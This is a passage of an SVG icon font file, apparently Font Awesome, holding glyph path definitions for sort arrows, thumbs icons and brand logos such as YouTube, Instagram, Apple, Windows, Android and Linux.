d="M736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23zM1792 -32v-192q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832
q14 0 23 -9t9 -23zM1600 480v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1408 992v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1216 1504v-192q0 -14 -9 -23t-23 -9h-256
q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23z" />
    <glyph glyph-name="sort_by_attributes_alt" unicode="&#xf161;" horiz-adv-x="1792" 
d="M1216 -32v-192q0 -14 -9 -23t-23 -9h-256q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h256q14 0 23 -9t9 -23zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192
q14 0 23 -9t9 -23zM1408 480v-192q0 -14 -9 -23t-23 -9h-448q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h448q14 0 23 -9t9 -23zM1600 992v-192q0 -14 -9 -23t-23 -9h-640q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h640q14 0 23 -9t9 -23zM1792 1504v-192q0 -14 -9 -23t-23 -9h-832
q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h832q14 0 23 -9t9 -23z" />
    <glyph glyph-name="sort_by_order" unicode="&#xf162;" 
d="M1346 223q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9t9 -23
zM1486 165q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5
t82 -252.5zM1456 882v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165z" />
    <glyph glyph-name="sort_by_order_alt" unicode="&#xf163;" 
d="M1346 1247q0 63 -44 116t-103 53q-52 0 -83 -37t-31 -94t36.5 -95t104.5 -38q50 0 85 27t35 68zM736 96q0 -12 -10 -24l-319 -319q-10 -9 -23 -9q-12 0 -23 9l-320 320q-15 16 -7 35q8 20 30 20h192v1376q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1376h192q14 0 23 -9
t9 -23zM1456 -142v-114h-469v114h167v432q0 7 0.5 19t0.5 17v16h-2l-7 -12q-8 -13 -26 -31l-62 -58l-82 86l192 185h123v-654h165zM1486 1189q0 -62 -13 -121.5t-41 -114t-68 -95.5t-98.5 -65.5t-127.5 -24.5q-62 0 -108 16q-24 8 -42 15l39 113q15 -7 31 -11q37 -13 75 -13
q84 0 134.5 58.5t66.5 145.5h-2q-21 -23 -61.5 -37t-84.5 -14q-106 0 -173 71.5t-67 172.5q0 105 72 178t181 73q123 0 205 -94.5t82 -252.5z" />
    <glyph glyph-name="_334" unicode="&#xf164;" horiz-adv-x="1664" 
d="M256 192q0 26 -19 45t-45 19q-27 0 -45.5 -19t-18.5 -45q0 -27 18.5 -45.5t45.5 -18.5q26 0 45 18.5t19 45.5zM416 704v-640q0 -26 -19 -45t-45 -19h-288q-26 0 -45 19t-19 45v640q0 26 19 45t45 19h288q26 0 45 -19t19 -45zM1600 704q0 -86 -55 -149q15 -44 15 -76
q3 -76 -43 -137q17 -56 0 -117q-15 -57 -54 -94q9 -112 -49 -181q-64 -76 -197 -78h-36h-76h-17q-66 0 -144 15.5t-121.5 29t-120.5 39.5q-123 43 -158 44q-26 1 -45 19.5t-19 44.5v641q0 25 18 43.5t43 20.5q24 2 76 59t101 121q68 87 101 120q18 18 31 48t17.5 48.5
t13.5 60.5q7 39 12.5 61t19.5 52t34 50q19 19 45 19q46 0 82.5 -10.5t60 -26t40 -40.5t24 -45t12 -50t5 -45t0.5 -39q0 -38 -9.5 -76t-19 -60t-27.5 -56q-3 -6 -10 -18t-11 -22t-8 -24h277q78 0 135 -57t57 -135z" />
    <glyph glyph-name="_335" unicode="&#xf165;" horiz-adv-x="1664" 
d="M256 960q0 -26 -19 -45t-45 -19q-27 0 -45.5 19t-18.5 45q0 27 18.5 45.5t45.5 18.5q26 0 45 -18.5t19 -45.5zM416 448v640q0 26 -19 45t-45 19h-288q-26 0 -45 -19t-19 -45v-640q0 -26 19 -45t45 -19h288q26 0 45 19t19 45zM1545 597q55 -61 55 -149q-1 -78 -57.5 -135
t-134.5 -57h-277q4 -14 8 -24t11 -22t10 -18q18 -37 27 -57t19 -58.5t10 -76.5q0 -24 -0.5 -39t-5 -45t-12 -50t-24 -45t-40 -40.5t-60 -26t-82.5 -10.5q-26 0 -45 19q-20 20 -34 50t-19.5 52t-12.5 61q-9 42 -13.5 60.5t-17.5 48.5t-31 48q-33 33 -101 120q-49 64 -101 121
t-76 59q-25 2 -43 20.5t-18 43.5v641q0 26 19 44.5t45 19.5q35 1 158 44q77 26 120.5 39.5t121.5 29t144 15.5h17h76h36q133 -2 197 -78q58 -69 49 -181q39 -37 54 -94q17 -61 0 -117q46 -61 43 -137q0 -32 -15 -76z" />
    <glyph glyph-name="youtube_sign" unicode="&#xf166;" 
d="M919 233v157q0 50 -29 50q-17 0 -33 -16v-224q16 -16 33 -16q29 0 29 49zM1103 355h66v34q0 51 -33 51t-33 -51v-34zM532 621v-70h-80v-423h-74v423h-78v70h232zM733 495v-367h-67v40q-39 -45 -76 -45q-33 0 -42 28q-6 17 -6 54v290h66v-270q0 -24 1 -26q1 -15 15 -15
q20 0 42 31v280h67zM985 384v-146q0 -52 -7 -73q-12 -42 -53 -42q-35 0 -68 41v-36h-67v493h67v-161q32 40 68 40q41 0 53 -42q7 -21 7 -74zM1236 255v-9q0 -29 -2 -43q-3 -22 -15 -40q-27 -40 -80 -40q-52 0 -81 38q-21 27 -21 86v129q0 59 20 86q29 38 80 38t78 -38
q21 -29 21 -86v-76h-133v-65q0 -51 34 -51q24 0 30 26q0 1 0.5 7t0.5 16.5v21.5h68zM785 1079v-156q0 -51 -32 -51t-32 51v156q0 52 32 52t32 -52zM1318 366q0 177 -19 260q-10 44 -43 73.5t-76 34.5q-136 15 -412 15q-275 0 -411 -15q-44 -5 -76.5 -34.5t-42.5 -73.5
q-20 -87 -20 -260q0 -176 20 -260q10 -43 42.5 -73t75.5 -35q137 -15 412 -15t412 15q43 5 75.5 35t42.5 73q20 84 20 260zM563 1017l90 296h-75l-51 -195l-53 195h-78q7 -23 23 -69l24 -69q35 -103 46 -158v-201h74v201zM852 936v130q0 58 -21 87q-29 38 -78 38
q-51 0 -78 -38q-21 -29 -21 -87v-130q0 -58 21 -87q27 -38 78 -38q49 0 78 38q21 27 21 87zM1033 816h67v370h-67v-283q-22 -31 -42 -31q-15 0 -16 16q-1 2 -1 26v272h-67v-293q0 -37 6 -55q11 -27 43 -27q36 0 77 45v-40zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5
h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="youtube" unicode="&#xf167;" 
d="M971 292v-211q0 -67 -39 -67q-23 0 -45 22v301q22 22 45 22q39 0 39 -67zM1309 291v-46h-90v46q0 68 45 68t45 -68zM343 509h107v94h-312v-94h105v-569h100v569zM631 -60h89v494h-89v-378q-30 -42 -57 -42q-18 0 -21 21q-1 3 -1 35v364h-89v-391q0 -49 8 -73
q12 -37 58 -37q48 0 102 61v-54zM1060 88v197q0 73 -9 99q-17 56 -71 56q-50 0 -93 -54v217h-89v-663h89v48q45 -55 93 -55q54 0 71 55q9 27 9 100zM1398 98v13h-91q0 -51 -2 -61q-7 -36 -40 -36q-46 0 -46 69v87h179v103q0 79 -27 116q-39 51 -106 51q-68 0 -107 -51
q-28 -37 -28 -116v-173q0 -79 29 -116q39 -51 108 -51q72 0 108 53q18 27 21 54q2 9 2 58zM790 1011v210q0 69 -43 69t-43 -69v-210q0 -70 43 -70t43 70zM1509 260q0 -234 -26 -350q-14 -59 -58 -99t-102 -46q-184 -21 -555 -21t-555 21q-58 6 -102.5 46t-57.5 99
q-26 112 -26 350q0 234 26 350q14 59 58 99t103 47q183 20 554 20t555 -20q58 -7 102.5 -47t57.5 -99q26 -112 26 -350zM511 1536h102l-121 -399v-271h-100v271q-14 74 -61 212q-37 103 -65 187h106l71 -263zM881 1203v-175q0 -81 -28 -118q-38 -51 -106 -51q-67 0 -105 51
q-28 38 -28 118v175q0 80 28 117q38 51 105 51q68 0 106 -51q28 -37 28 -117zM1216 1365v-499h-91v55q-53 -62 -103 -62q-46 0 -59 37q-8 24 -8 75v394h91v-367q0 -33 1 -35q3 -22 21 -22q27 0 57 43v381h91z" />
    <glyph glyph-name="xing" unicode="&#xf168;" horiz-adv-x="1408" 
d="M597 869q-10 -18 -257 -456q-27 -46 -65 -46h-239q-21 0 -31 17t0 36l253 448q1 0 0 1l-161 279q-12 22 -1 37q9 15 32 15h239q40 0 66 -45zM1403 1511q11 -16 0 -37l-528 -934v-1l336 -615q11 -20 1 -37q-10 -15 -32 -15h-239q-42 0 -66 45l-339 622q18 32 531 942
q25 45 64 45h241q22 0 31 -15z" />
    <glyph glyph-name="xing_sign" unicode="&#xf169;" 
d="M685 771q0 1 -126 222q-21 34 -52 34h-184q-18 0 -26 -11q-7 -12 1 -29l125 -216v-1l-196 -346q-9 -14 0 -28q8 -13 24 -13h185q31 0 50 36zM1309 1268q-7 12 -24 12h-187q-30 0 -49 -35l-411 -729q1 -2 262 -481q20 -35 52 -35h184q18 0 25 12q8 13 -1 28l-260 476v1
l409 723q8 16 0 28zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="youtube_play" unicode="&#xf16a;" horiz-adv-x="1792" 
d="M711 408l484 250l-484 253v-503zM896 1270q168 0 324.5 -4.5t229.5 -9.5l73 -4q1 0 17 -1.5t23 -3t23.5 -4.5t28.5 -8t28 -13t31 -19.5t29 -26.5q6 -6 15.5 -18.5t29 -58.5t26.5 -101q8 -64 12.5 -136.5t5.5 -113.5v-40v-136q1 -145 -18 -290q-7 -55 -25 -99.5t-32 -61.5
l-14 -17q-14 -15 -29 -26.5t-31 -19t-28 -12.5t-28.5 -8t-24 -4.5t-23 -3t-16.5 -1.5q-251 -19 -627 -19q-207 2 -359.5 6.5t-200.5 7.5l-49 4l-36 4q-36 5 -54.5 10t-51 21t-56.5 41q-6 6 -15.5 18.5t-29 58.5t-26.5 101q-8 64 -12.5 136.5t-5.5 113.5v40v136
q-1 145 18 290q7 55 25 99.5t32 61.5l14 17q14 15 29 26.5t31 19.5t28 13t28.5 8t23.5 4.5t23 3t17 1.5q251 18 627 18z" />
    <glyph glyph-name="dropbox" unicode="&#xf16b;" horiz-adv-x="1792" 
d="M402 829l494 -305l-342 -285l-490 319zM1388 274v-108l-490 -293v-1l-1 1l-1 -1v1l-489 293v108l147 -96l342 284v2l1 -1l1 1v-2l343 -284zM554 1418l342 -285l-494 -304l-338 270zM1390 829l338 -271l-489 -319l-343 285zM1239 1418l489 -319l-338 -270l-494 304z" />
    <glyph glyph-name="stackexchange" unicode="&#xf16c;" 
d="M1289 -96h-1118v480h-160v-640h1438v640h-160v-480zM347 428l33 157l783 -165l-33 -156zM450 802l67 146l725 -339l-67 -145zM651 1158l102 123l614 -513l-102 -123zM1048 1536l477 -641l-128 -96l-477 641zM330 65v159h800v-159h-800z" />
    <glyph glyph-name="instagram" unicode="&#xf16d;" 
d="M1024 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1162 640q0 -164 -115 -279t-279 -115t-279 115t-115 279t115 279t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270
q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5
t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 18.5q50 20 88 58t58 88q11 29 18.5 71.5t10 103t3 96.5t0 105.5t-0.5 76.5t0.5 76.5t0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317
q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124t-124 322q-5 88 -5 317t5 317q10 208 124 322t322 124q88 5 317 5t317 -5q208 -10 322 -124t124 -322q5 -88 5 -317z" />
    <glyph glyph-name="flickr" unicode="&#xf16e;" 
d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960zM698 640q0 88 -62 150t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150zM1262 640q0 88 -62 150
t-150 62t-150 -62t-62 -150t62 -150t150 -62t150 62t62 150z" />
    <glyph glyph-name="adn" unicode="&#xf170;" 
d="M768 914l201 -306h-402zM1133 384h94l-459 691l-459 -691h94l104 160h522zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="f171" unicode="&#xf171;" horiz-adv-x="1408" 
d="M815 677q8 -63 -50.5 -101t-111.5 -6q-39 17 -53.5 58t-0.5 82t52 58q36 18 72.5 12t64 -35.5t27.5 -67.5zM926 698q-14 107 -113 164t-197 13q-63 -28 -100.5 -88.5t-34.5 -129.5q4 -91 77.5 -155t165.5 -56q91 8 152 84t50 168zM1165 1240q-20 27 -56 44.5t-58 22
t-71 12.5q-291 47 -566 -2q-43 -7 -66 -12t-55 -22t-50 -43q30 -28 76 -45.5t73.5 -22t87.5 -11.5q228 -29 448 -1q63 8 89.5 12t72.5 21.5t75 46.5zM1222 205q-8 -26 -15.5 -76.5t-14 -84t-28.5 -70t-58 -56.5q-86 -48 -189.5 -71.5t-202 -22t-201.5 18.5q-46 8 -81.5 18
t-76.5 27t-73 43.5t-52 61.5q-25 96 -57 292l6 16l18 9q223 -148 506.5 -148t507.5 148q21 -6 24 -23t-5 -45t-8 -37zM1403 1166q-26 -167 -111 -655q-5 -30 -27 -56t-43.5 -40t-54.5 -31q-252 -126 -610 -88q-248 27 -394 139q-15 12 -25.5 26.5t-17 35t-9 34t-6 39.5
t-5.5 35q-9 50 -26.5 150t-28 161.5t-23.5 147.5t-22 158q3 26 17.5 48.5t31.5 37.5t45 30t46 22.5t48 18.5q125 46 313 64q379 37 676 -50q155 -46 215 -122q16 -20 16.5 -51t-5.5 -54z" />
    <glyph glyph-name="bitbucket_sign" unicode="&#xf172;" 
d="M848 666q0 43 -41 66t-77 1q-43 -20 -42.5 -72.5t43.5 -70.5q39 -23 81 4t36 72zM928 682q8 -66 -36 -121t-110 -61t-119 40t-56 113q-2 49 25.5 93t72.5 64q70 31 141.5 -10t81.5 -118zM1100 1073q-20 -21 -53.5 -34t-53 -16t-63.5 -8q-155 -20 -324 0q-44 6 -63 9.5
t-52.5 16t-54.5 32.5q13 19 36 31t40 15.5t47 8.5q198 35 408 1q33 -5 51 -8.5t43 -16t39 -31.5zM1142 327q0 7 5.5 26.5t3 32t-17.5 16.5q-161 -106 -365 -106t-366 106l-12 -6l-5 -12q26 -154 41 -210q47 -81 204 -108q249 -46 428 53q34 19 49 51.5t22.5 85.5t12.5 71z
M1272 1020q9 53 -8 75q-43 55 -155 88q-216 63 -487 36q-132 -12 -226 -46q-38 -15 -59.5 -25t-47 -34t-29.5 -54q8 -68 19 -138t29 -171t24 -137q1 -5 5 -31t7 -36t12 -27t22 -28q105 -80 284 -100q259 -28 440 63q24 13 39.5 23t31 29t19.5 40q48 267 80 473zM1536 1120
v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="tumblr" unicode="&#xf173;" horiz-adv-x="1024" 
d="M944 207l80 -237q-23 -35 -111 -66t-177 -32q-104 -2 -190.5 26t-142.5 74t-95 106t-55.5 120t-16.5 118v544h-168v215q72 26 129 69.5t91 90t58 102t34 99t15 88.5q1 5 4.5 8.5t7.5 3.5h244v-424h333v-252h-334v-518q0 -30 6.5 -56t22.5 -52.5t49.5 -41.5t81.5 -14
q78 2 134 29z" />
    <glyph glyph-name="tumblr_sign" unicode="&#xf174;" 
d="M1136 75l-62 183q-44 -22 -103 -22q-36 -1 -62 10.5t-38.5 31.5t-17.5 40.5t-5 43.5v398h257v194h-256v326h-188q-8 0 -9 -10q-5 -44 -17.5 -87t-39 -95t-77 -95t-118.5 -68v-165h130v-418q0 -57 21.5 -115t65 -111t121 -85.5t176.5 -30.5q69 1 136.5 25t85.5 50z
M1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="long_arrow_down" unicode="&#xf175;" horiz-adv-x="768" 
d="M765 237q8 -19 -5 -35l-350 -384q-10 -10 -23 -10q-14 0 -24 10l-355 384q-13 16 -5 35q9 19 29 19h224v1248q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-1248h224q21 0 29 -19z" />
    <glyph glyph-name="long_arrow_up" unicode="&#xf176;" horiz-adv-x="768" 
d="M765 1043q-9 -19 -29 -19h-224v-1248q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1248h-224q-21 0 -29 19t5 35l350 384q10 10 23 10q14 0 24 -10l355 -384q13 -16 5 -35z" />
    <glyph glyph-name="long_arrow_left" unicode="&#xf177;" horiz-adv-x="1792" 
d="M1792 736v-192q0 -14 -9 -23t-23 -9h-1248v-224q0 -21 -19 -29t-35 5l-384 350q-10 10 -10 23q0 14 10 24l384 354q16 14 35 6q19 -9 19 -29v-224h1248q14 0 23 -9t9 -23z" />
    <glyph glyph-name="long_arrow_right" unicode="&#xf178;" horiz-adv-x="1792" 
d="M1728 643q0 -14 -10 -24l-384 -354q-16 -14 -35 -6q-19 9 -19 29v224h-1248q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h1248v224q0 21 19 29t35 -5l384 -350q10 -10 10 -23z" />
    <glyph glyph-name="apple" unicode="&#xf179;" horiz-adv-x="1408" 
d="M1393 321q-39 -125 -123 -250q-129 -196 -257 -196q-49 0 -140 32q-86 32 -151 32q-61 0 -142 -33q-81 -34 -132 -34q-152 0 -301 259q-147 261 -147 503q0 228 113 374q113 144 284 144q72 0 177 -30q104 -30 138 -30q45 0 143 34q102 34 173 34q119 0 213 -65
q52 -36 104 -100q-79 -67 -114 -118q-65 -94 -65 -207q0 -124 69 -223t158 -126zM1017 1494q0 -61 -29 -136q-30 -75 -93 -138q-54 -54 -108 -72q-37 -11 -104 -17q3 149 78 257q74 107 250 148q1 -3 2.5 -11t2.5 -11q0 -4 0.5 -10t0.5 -10z" />
    <glyph glyph-name="windows" unicode="&#xf17a;" horiz-adv-x="1664" 
d="M682 530v-651l-682 94v557h682zM682 1273v-659h-682v565zM1664 530v-786l-907 125v661h907zM1664 1408v-794h-907v669z" />
    <glyph glyph-name="android" unicode="&#xf17b;" horiz-adv-x="1408" 
d="M493 1053q16 0 27.5 11.5t11.5 27.5t-11.5 27.5t-27.5 11.5t-27 -11.5t-11 -27.5t11 -27.5t27 -11.5zM915 1053q16 0 27 11.5t11 27.5t-11 27.5t-27 11.5t-27.5 -11.5t-11.5 -27.5t11.5 -27.5t27.5 -11.5zM103 869q42 0 72 -30t30 -72v-430q0 -43 -29.5 -73t-72.5 -30
t-73 30t-30 73v430q0 42 30 72t73 30zM1163 850v-666q0 -46 -32 -78t-77 -32h-75v-227q0 -43 -30 -73t-73 -30t-73 30t-30 73v227h-138v-227q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73l-1 227h-74q-46 0 -78 32t-32 78v666h918zM931 1255q107 -55 171 -153.5t64 -215.5
h-925q0 117 64 215.5t172 153.5l-71 131q-7 13 5 20q13 6 20 -6l72 -132q95 42 201 42t201 -42l72 132q7 12 20 6q12 -7 5 -20zM1408 767v-430q0 -43 -30 -73t-73 -30q-42 0 -72 30t-30 73v430q0 43 30 72.5t72 29.5q43 0 73 -29.5t30 -72.5z" />
    <glyph glyph-name="linux" unicode="&#xf17c;" 
d="M663 1125q-11 -1 -15.5 -10.5t-8.5 -9.5q-5 -1 -5 5q0 12 19 15h10zM750 1111q-4 -1 -11.5 6.5t-17.5 4.5q24 11 32 -2q3 -6 -3 -9zM399 684q-4 1 -6 -3t-4.5 -12.5t-5.5 -13.5t-10 -13q-10 -11 -1 -12q4 -1 12.5 7t12.5 18q1 3 2 7t2 6t1.5 4.5t0.5 4v3t-1 2.5t-3 2z
M1254 325q0 18 -55 42q4 15 7.5 27.5t5 26t3 21.5t0.5 22.5t-1 19.5t-3.5 22t-4 20.5t-5 25t-5.5 26.5q-10 48 -47 103t-72 75q24 -20 57 -83q87 -162 54 -278q-11 -40 -50 -42q-31 -4 -38.5 18.5t-8 83.5t-11.5 107q-9 39 -19.5 69t-19.5 45.5t-15.5 24.5t-13 15t-7.5 7
q-14 62 -31 103t-29.5 56t-23.5 33t-15 40q-4 21 6 53.5t4.5 49.5t-44.5 25q-15 3 -44.5 18t-35.5 16q-8 1 -11 26t8 51t36 27q37 3 51 -30t4 -58q-11 -19 -2 -26.5t30 -0.5q13 4 13 36v37q-5 30 -13.5 50t-21 30.5t-23.5 15t-27 7.5q-107 -8 -89 -134q0 -15 -1 -15
q-9 9 -29.5 10.5t-33 -0.5t-15.5 5q1 57 -16 90t-45 34q-27 1 -41.5 -27.5t-16.5 -59.5q-1 -15 3.5 -37t13 -37.5t15.5 -13.5q10 3 16 14q4 9 -7 8q-7 0 -15.5 14.5t-9.5 33.5q-1 22 9 37t34 14q17 0 27 -21t9.5 -39t-1.5 -22q-22 -15 -31 -29q-8 -12 -27.5 -23.5
t-20.5 -12.5q-13 -14 -15.5 -27t7.5 -18q14 -8 25 -19.5t16 -19t18.5 -13t35.5 -6.5q47 -2 102 15q2 1 23 7t34.5 10.5t29.5 13t21 17.5q9 14 20 8q5 -3 6.5 -8.5t-3 -12t-16.5 -9.5q-20 -6 -56.5 -21.5t-45.5 -19.5q-44 -19 -70 -23q-25 -5 -79 2q-10 2 -9 -2t17 -19
q25 -23 67 -22q17 1 36 7t36 14t33.5 17.5t30 17t24.5 12t17.5 2.5t8.5 -11q0 -2 -1 -4.5t-4 -5t-6 -4.5t-8.5 -5t-9 -4.5t-10 -5t-9.5 -4.5q-28 -14 -67.5 -44t-66.5 -43t-49 -1q-21 11 -63 73q-22 31 -25 22q-1 -3 -1 -10q0 -25 -15 -56.5t-29.5 -55.5t-21 -58t11.5 -63
q-23 -6 -62.5 -90t-47.5 -141q-2 -18 -1.5 -69t-5.5 -59q-8 -24 -29 -3q-32 31 -36 94q-2 28 4 56q4 19 -1 18q-2 -1 -4 -5q-36 -65 10 -166q5 -12 25 -28t24 -20q20 -23 104 -90.5t93 -76.5q16 -15 17.5 -38t-14 -43t-45.5 -23q8 -15 29 -44.5t28 -54t7 -70.5q46 24 7 92
q-4 8 -10.5 16t-9.5 12t-2 6q3 5 13 9.5t20 -2.5q46 -52 166 -36q133 15 177 87q23 38 34 30q12 -6 10 -52q-1 -25 -23 -92q-9 -23 -6 -37.5t24 -15.5q3 19 14.5 77t13.5 90q2 21 -6.5 73.5t-7.5 97t23 70.5q15 18 51 18q1 37 34.5 53t72.5 10.5t60 -22.5zM626 1152
q3 17 -2.5 30t-11.5 15q-9 2 -9 -7q2 -5 5 -6q10 0 7 -15q-3 -20 8 -20q3 0 3 3zM1045 955q-2 8 -6.5 11.5t-13 5t-14.5 5.5q-5 3 -9.5 8t-7 8t-5.5 6.5t-4 4t-4 -1.5q-14 -16 7 -43.5t39 -31.5q9 -1 14.5 8t3.5 20zM867 1168q0 11 -5 19.5t-11 12.5t-9 3q-6 0 -8 -2t0 -4
t5 -3q14 -4 18 -31q0 -3 8 2q2 2 2 3zM921 1401q0 2 -2.5 5t-9 7t-9.5 6q-15 15 -24 15q-9 -1 -11.5 -7.5t-1 -13t-0.5 -12.5q-1 -4 -6 -10.5t-6 -9t3 -8.5q4 -3 8 0t11 9t15 9q1 1 9 1t15 2t9 7zM1486 60q20 -12 31 -24.5t12 -24t-2.5 -22.5t-15.5 -22t-23.5 -19.5
t-30 -18.5t-31.5 -16.5t-32 -15.5t-27 -13q-38 -19 -85.5 -56t-75.5 -64q-17 -16 -68 -19.5t-89 14.5q-18 9 -29.5 23.5t-16.5 25.5t-22 19.5t-47 9.5q-44 1 -130 1q-19 0 -57 -1.5t-58 -2.5q-44 -1 -79.5 -15t-53.5 -30t-43.5 -28.5t-53.5 -11.5q-29 1 -111 31t-146 43
q-19 4 -51 9.5t-50 9t-39.5 9.5t-33.5 14.5t-17 19.5q-10 23 7 66.5t18 54.5q1 16 -4 40t-10 42.5t-4.5 36.5t10.5 27q14 12 57 14t60 12q30 18 42 35t12 51q21 -73 -32 -106q-32 -20 -83 -15q-34 3 -43 -10q-13 -15 5 -57q2 -6 8 -18t8.5 -18t4.5 -17t1 -22q0 -15 -17 -49
t-14 -48q3 -17 37 -26q20 -6 84.5 -18.5t99.5 -20.5q24 -6 74 -22t82.5 -23t55.5 -4q43 6 64.5 28t23 48t-7.5 58.5t-19 52t-20 36.5q-121 190 -169 242q-68 74 -113 40q-11 -9 -15 15q-3 16 -2 38q1 29 10 52t24 47t22 42q8 21 26.5 72t29.5 78t30 61t39 54
q110 143 124 195q-12 112 -16 310q-2 90 24 151.5t106 104.5q39 21 104 21q53 1 106 -13.5t89 -41.5q57 -42 91.5 -121.5t29.5 -147.5q-5 -95 30 -214q34 -113 133 -218q55 -59 99.5 -163t59.5 -191q8 -49 5 -84.5t-12 -55.5t-20 -22q-10 -2 -23.5 -19t-27 -35.5
t-40.5 -33.5t-61 -14q-18 1 -31.5 5t-22.5 13.5t-13.5 15.5t-11.5 20.5t-9 19.5q-22 37 -41 30t-28 -49t7 -97q20 -70 1 -195q-10 -65 18 -100.5t73 -33t85 35.5q59 49 89.5 66.5t103.5 42.5q53 18 77 36.5t18.5 34.5t-25 28.5t-51.5 23.5q-33 11 -49.5 48t-15 72.5
t15.5 47.5q1 -31 8 -56.5t14.5 -40.5t20.5 -28.5t21 -19t21.5 -13t16.5 -9.5z" />
    <glyph glyph-name="dribble" unicode="&#xf17d;" 
d="M1024 36q-42 241 -140 498h-2l-2 -1q-16 -6 -43 -16.5t-101 -49t-137 -82t-131 -114.5t-103 -148l-15 11q184 -150 418 -150q132 0 256 52zM839 643q-21 49 -53 111q-311 -93 -673 -93q-1 -7 -1 -21q0 -124 44 -236.5t124 -201.5q50 89 123.5 166.5t142.5 124.5t130.5 81
t99.5 48l37 13q4 1 13 3.5t13 4.5zM732 855q-120 213 -244 378q-138 -65 -234 -186t-128 -272q302 0 606 80zM1416 536q-210 60 -409 29q87 -239 128 -469q111 75 185 189.5t96 250.5zM611 1277q-1 0 -2 -1q1 1 2 1zM1201 1132q-185 164 -433 164q-76 0 -155 -19
q131 -170 246 -382q69 26 130 60.5t96.5 61.5t65.5 57t37.5 40.5zM1424 647q-3 232 -149 410l-1 -1q-9 -12 -19 -24.5t-43.5 -44.5t-71 -60.5t-100 -65t-131.5 -64.5q25 -53 44 -95q2 -5 6.5 -17t7.5 -17q36 5 74.5 7t73.5 2t69 -1.5t64 -4t56.5 -5.5t48 -6.5t36.5 -6
t25 -4.5zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="skype" unicode="&#xf17e;" 
